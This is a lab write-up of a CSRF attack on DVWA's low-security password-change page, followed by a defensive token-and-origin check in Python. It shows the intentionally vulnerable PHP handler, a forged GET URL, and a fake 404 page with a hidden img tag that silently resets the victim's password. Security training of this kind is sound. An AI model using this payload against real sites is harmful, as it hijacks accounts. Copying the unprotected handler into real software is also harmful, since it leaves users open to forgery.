CSRF low-level notes: DVWA practice range

Low-level source code

Analysis: if Change is set (the button was clicked) and password_new and password_conf are identical, the new password is hashed with MD5 and written to the database. Note that the handler reads everything from $_GET and performs no origin or token check, which is what makes the request forgeable.

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

After clicking Change, the URL in the address bar reads:

http://192.168.140.147/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#

So if a link of this form is built with a different password, the password is changed as soon as the logged-in user clicks it. Clicking such a link directly does work, but a bare malicious link like this is too obvious.

Instead, a web page can be built that changes the password automatically when the user opens it.

As follows:

On a public server (here, the virtual machine) create a page:

changepw.html

<img src="http://192.168.140.147/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display:none;"/>

<h1>404 Not found.</h1>

<h2>file not found.</h2>

The page's address on the server would be, for example:

http://192.168.140.147/changepw.html

When a user visits that address the server returns:
GET /changepw.html HTTP/1.1

HTTP/1.1 200 OK
Content-Type: text/html

<img src="http://192.168.140.147/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display:none;"/>

<h1>404 Not found.</h1>

<h2>file not found.</h2>

To load the img tag, the browser sends a GET request (with the victim's DVWA session cookie attached automatically):
GET /dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change HTTP/1.1
Host: 192.168.140.147

HTTP/1.1 200 OK
Date: Wed, 17 Mar 2021 08:34:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<body>.....
</body>
</html>

The password is thus changed silently.

Done.
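For contrast with the low-level handler above, the following is an added example (not DVWA code, and not part of the original post) of the checks a password-change endpoint needs so that the hidden-img request above is refused: state changes only over POST, an Origin/Referer allow-list, and a per-session synchronizer token compared in constant time and rotated after each use. The allowed origin, the Session class and the request dictionaries are assumptions constructed for this example. One caveat it makes visible: in the post's setup changepw.html is hosted on the same host as DVWA, so a Referer check alone would pass; the request is stopped by the method and token checks.

```python
"""Defensive counterpart to the DVWA 'low' CSRF handler (added example, not DVWA code)."""
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlparse

# Assumption: the DVWA host from the post is the only origin allowed to submit the form.
ALLOWED_ORIGIN = "http://192.168.140.147"


class Session:
    """Minimal stand-in for the server-side session store (constructed for this example)."""

    def __init__(self) -> None:
        self.csrf_token: Optional[str] = None


def issue_token(session: Session) -> str:
    """Mint a fresh random token, store it in the session, and return it for the hidden form field."""
    session.csrf_token = secrets.token_hex(32)
    return session.csrf_token


def origin_allowed(headers: Dict[str, str]) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) matches the allow-listed origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == ALLOWED_ORIGIN


def token_valid(session: Session, presented: Optional[str]) -> bool:
    """Constant-time comparison of the submitted token against the session's token."""
    if session.csrf_token is None or presented is None:
        return False
    return hmac.compare_digest(session.csrf_token.encode(), presented.encode())


def check_change_password(session: Session, method: str,
                          headers: Dict[str, str], params: Dict[str, str]) -> Tuple[bool, str]:
    """Gate for the password-change action. Returns (allowed, reason); the caller
    touches the database only when allowed is True."""
    if method != "POST":
        return False, "state change must use POST, not GET"
    if not origin_allowed(headers):
        return False, "origin not allowed"
    if not token_valid(session, params.get("user_token")):
        return False, "missing or invalid csrf token"
    if params.get("password_new") != params.get("password_conf"):
        return False, "passwords did not match"
    issue_token(session)  # rotate so the same token cannot be replayed
    return True, "ok"


def main() -> None:
    session = Session()
    token = issue_token(session)
    # Constructed: the request the hidden <img> in changepw.html produces. The Referer passes the
    # origin check because the attacker page sits on the same host in the post, but the request
    # is still refused: it is a GET and carries no token.
    forged = check_change_password(
        session, "GET", {"Referer": "http://192.168.140.147/changepw.html"},
        {"password_new": "123456", "password_conf": "123456", "Change": "Change"})
    legit = check_change_password(
        session, "POST", {"Origin": ALLOWED_ORIGIN},
        {"password_new": "s3cret", "password_conf": "s3cret", "user_token": token})
    replay = check_change_password(
        session, "POST", {"Origin": ALLOWED_ORIGIN},
        {"password_new": "s3cret", "password_conf": "s3cret", "user_token": token})
    print("forged img GET:", forged)
    print("legitimate POST:", legit)
    print("replayed token:", replay)


if __name__ == "__main__":
    main()
```

In a real PHP handler the same three checks map onto `$_SERVER['REQUEST_METHOD']`, `$_SERVER['HTTP_ORIGIN']` / `HTTP_REFERER`, and a token held in `$_SESSION` and compared with `hash_equals()`; the token must be generated with a CSPRNG and embedded in the form as a hidden field, never derived from anything the attacker's page can read.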

posted @ 2021-03-17 17:16  codeace